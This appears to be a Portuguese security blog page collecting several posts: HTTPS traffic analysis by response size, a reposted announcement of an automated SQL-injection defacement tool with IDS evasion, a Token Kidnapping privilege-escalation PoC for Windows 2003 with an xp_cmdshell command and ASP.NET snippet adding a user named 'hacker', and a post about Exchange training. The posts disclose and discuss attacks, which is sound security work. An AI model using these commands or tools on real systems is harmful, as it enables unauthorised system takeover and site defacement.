No caso de uma comunicação via HTTPS, a quantidade de bytes transferidos entre o cliente e o servidor pode identificar o conteúdo estático requisitado, tal como imagens ou downloads. Portanto, tendo o livre acesso a este conteúdo no servidor, é possível indexá-lo pelo tamanho, para posteriormente identificar a atividade numa sessão encriptada de outro cliente.

Por exemplo, num aplicativo webmail ou num fórum, podem-se mapear todas as imagens. Ao interceptar comunicação codificada com este aplicativo, identificando as imagens, é possível ter uma idéia do que está acontecendo “do outro lado”: por exemplo, que tipo de anexo que o usuário costuma baixar do servidor (identificando através do ícone), ou até mesmo a identidade do usuário em questão (identificando através do avatar).

Implementação:

O famoso buscador de torrents, The Pirate Bay, recentemente disponibilizou a opção de utilizar HTTPS na navegação pelo seu site. Porém, a própria natureza dos arquivos .torrent facilita a sua identificação pelo tamanho: o seu conteúdo consiste de hashes dos blocos dos dados compartilhados pela rede P2P, existindo uma correlação do tamanho do .torrent com o tamanho do(s) arquivo(s) compartilhado(s). Por outro lado, nomes extensos dados aos torrents também auxiliam na sua indexação.

Para os fins de testar a identificação do conteúdo pelo seu tamanho, os torrents mais populares e os mais recentes foram indexados pelo tamanho do arquivo hospedado em si, assim como pelo tamanho do seu nome (no caso, URI). Obteve-se a seguinte distribuição do tamanho do arquivo, numa população de aproximadamente 165 mil torrents:

Os torrents mais comuns, os de aproximadamente 14 KB, representam as imagens de CDs (.iso) de aproximadamente 700 MB.

Também foi desenvolvido um script em Perl capaz de identificar (através do Wireshark) o tamanho do request/response de uma sessão capturada de HTTPS (desde que empregue o cipher TLS):

Para mais informações, acesse http://sysd.org/stas/node/220.

Stanislaw Pusep
creaktive@gmail.com
http://neuromanticos.sysd.org/

Sem comentários »

Boa tarde!

Para quem tem interesse em testar alguma aplicação desenvolvida internamente ou testar uma solução de terceiro que está instalada na sua empresa, segue uma excelente ferramenta para a realização de teste de invasão em aplicações. A ferramenta foca no ataque de SQL Injection. Recomendo também a utilização pelas equipes de auditoria de sistemas.

Abraços, Denny Roger (denny@epsec.com.br)

Por Raviv Raz

I wrote a proof of concept tool, based on the ASPROX bot that has been attacking millions of SQL-injection prone web sites running MS-SQL servers at their backends.

Given a list of URLs that can be retrieved using various crawlers found on the web, it tests for SQL injection via URL parameters. In case one works, it attemps to either inject defacement content as entered by the user or alternatively to run an OS command on the SQL server.

- Injector win32 executable
- Injector source code (Python) + GPL license

Main Features:

1 - Written in Python
2 - Uses the robust CURL library - fastest HTTP request crafter in the world
3 - Encodes payload query in binary format to encapsulate internal SQL syntax and evade IDS systems
4 - URL encodes all content to comply with standard GET requests
5 - Allows usage of HTTP proxy

ToDo:

1 - Parallelize URL attacks
2 - Attack web forms with POST requests
3 - Build GUI (IronPython…?)

Feature requests and bug reports are welcome at:

ravivr_at_gmail_dot_com

Fonte: http://chaptersinwebsecurity.blogspot.com/2008/10/automatic-web-site-defacement.html.

Sem comentários »

Por Cesar Cerrudo

It has been a long time since Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) was published so I decided to release a PoC exploit for Win2k3 that alows to execute code under SYSTEM account.

Basically if you can run code under any service in Win2k3 then you can own Windows, this is because Windows services accounts can impersonate.

Other process (not services) that can impersonate are IIS 6 worker processes so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recomend to not allow users to run this kind of code from ASP.

-SQL Server is a nice target for the exploit if you are a DBA and want to own Windows:

exec xp_cmdshell ‘churrasco “net user /add hacker”‘

-Exploiting IIS 6 with ASP .NET :
…
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath(”churrasco.exe”);
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= ” \”net user /add hacker\” “;
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
…

You can find the PoC exploit here http://www.argeniss.com/research/Churrasco.zip

Enjoy.

Cesar Cerrudo

Fonte: http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html

Sem comentários »

Esta semana estou participando de dois cursos: Introduction to Installing and Managing Microsoft Exchange Server 2007 e Managing Messaging Security using Microsoft Exchange Server 2007. O meu objetivo é conhecer na teoria e na prática os recursos de segurança disponíveis neste tipo de tecnologia. O meu foco está na segurança porque não administro servidores de correio eletrônico, porém, realizo auditorias e defino regras de firewall para ajudar na proteção do serviço de e-mail.

Hoje encontrei com um colega da área de infra-estrutura de rede e que por acaso também é o instrutor dos cursos, o Rover Marinho. Na minha opinião, o Rover é um dos melhores instrutores de cursos oficiais da Microsoft no Brasil. Aproveitando o intervalo do curso, o Rover me mostrou algumas fotos do treinamento de ISA Server realizado em 2007. As fotos mostram o mascote da turma do Linux (pingüim) na mesa do instrutor e também alguns desenhos do mascote da turma do FreeBSD no quadro branco. Foi muito divertido “provocar” a turma da Microsoft durante o treinamento do ISA Server. Não posso esquecer de comentar que a minha formação técnica é toda Microsoft, porém, trabalho há alguns anos com tecnologias de segurança baseadas em FreeBSD e Linux. Não podia perder a oportunidade da brincadeira durante o treinamento da Microsoft em 2007.

Para não perder o ritmo, esta semana tenho 8 palestras sobre segurança da informação na minha agenda. Estarei apresentando casos reais de vingança pela internet, a ameaça dos novos e-mails falsos que não são detectados pelos sistemas de antispam, as técnicas utilizadas pelos crackers no desenvolvimento de programas espiões, técnicas de juntar dois arquivos em um, as novas páginas clonadas, as ações jurídicas em um caso real de fraude corporativa, etc. Estarão participando das palestras mais de 1.000 profissionais de diversas áreas (jurídico, segurança da informação, recursos humanos, administrativo, marketing, tecnologia da informação, comercial, etc). O objetivo das apresentações é transformar o intangível em algo tangível e conscientizar as pessoas sobre os riscos na internet.

Em breve estarei publicando alguns recursos de segurança para correio eletrônico. Aguardem!

Abraços,

Denny Roger
denny@epesec.com.br

Sem comentários »